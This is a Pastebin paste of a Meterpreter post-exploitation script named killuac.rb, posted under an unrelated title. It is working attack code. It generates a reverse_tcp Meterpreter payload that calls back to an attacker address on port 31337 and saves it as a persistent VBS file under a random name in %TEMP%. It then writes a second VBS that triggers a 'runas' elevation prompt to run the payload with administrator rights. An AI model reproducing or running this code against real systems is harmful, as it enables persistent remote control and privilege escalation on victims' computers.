Want more features on Pastebin? Sign Up, it's FREE!
Guest

getcountermeasure v2 script

By: a guest on Dec 4th, 2010  |  syntax: Bash  |  size: 2.05 KB  |  views: 854  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. # $Id: killuac.rb spudgunman $
  2. #
  3. # Meterpreter script to prompt for permissions to run in elevated mode and then call home
  4. # some code pulled from the persistence.rb script
  5. # Script by Kelly Keeton<kellykeeton [at] hotmail>
  6. # Version: 0.5
  7. #
  8. # Default parameters
  9. #
  10. rhost = "192.168.254.129"
  11. rport = 31337
  12. payload = "windows/meterpreter/reverse_tcp"
  13. ##
  14.  
  15. tempdir = client.fs.file.expand_path("%TEMP%")
  16. payloadfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
  17.  
  18. platform = client.platform.scan(/(win32|win64)/)
  19. unsupported if not platform
  20.  
  21. print_status("Creating a payload to run elevated UAC: LHOST=#{rhost} LPORT=#{rport}")
  22. pay = client.framework.payloads.create("#{payload}")
  23. pay.datastore['LHOST'] = rhost
  24. pay.datastore['LPORT'] = rport
  25. raw  = pay.generate
  26.  
  27. payloadvbs = ::Msf::Util::EXE.to_win32pe_vbs(client.framework, raw, {:persist => true, :delay => 5})
  28. print_status("Payload script is #{payloadvbs.length} bytes long")
  29.  
  30. uacvbs = "
  31. If WScript.Arguments.length =0 Then
  32.  Set objShell = CreateObject(\"Shell.Application\")
  33.  objShell.ShellExecute WScript.FullName, WScript.ScriptFullName & \" noloop\", vbNullString, \"runas\"
  34. Else
  35.  Set objShell = WScript.CreateObject(\"WScript.Shell\")
  36.  Set objFSO = CreateObject(\"Scripting.FileSystemObject\")
  37.  strPath = Wscript.ScriptFullName
  38.  Set objFile = objFSO.GetFile(strPath)
  39.  strFolder = objFSO.GetParentFolderName(objFile)
  40.  tmp = \"wscript \" & Chr(34) & \"#{payloadfile}\" & Chr(34)
  41.  objShell.Run(tmp)
  42. End If"
  43. #
  44. # Upload to the filesystem
  45. #
  46. elevationfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
  47. print_status("UAC elevation script written to #{elevationfile}")
  48. fd = client.fs.file.new(elevationfile, "wb")
  49. fd.write(uacvbs)
  50. fd.close
  51.  
  52. print_status("payload script written to #{payloadfile}")
  53. fd = client.fs.file.new(payloadfile, "wb")
  54. fd.write(payloadvbs)
  55. fd.close
  56. #
  57. # Execute the script
  58. #
  59. proc = session.sys.process.execute("wscript \"#{elevationfile}\"", nil, {'Hidden' => false})
  60. print_status("Script executed with PID #{proc.pid}")
  61. #EOF
clone this paste RAW Paste Data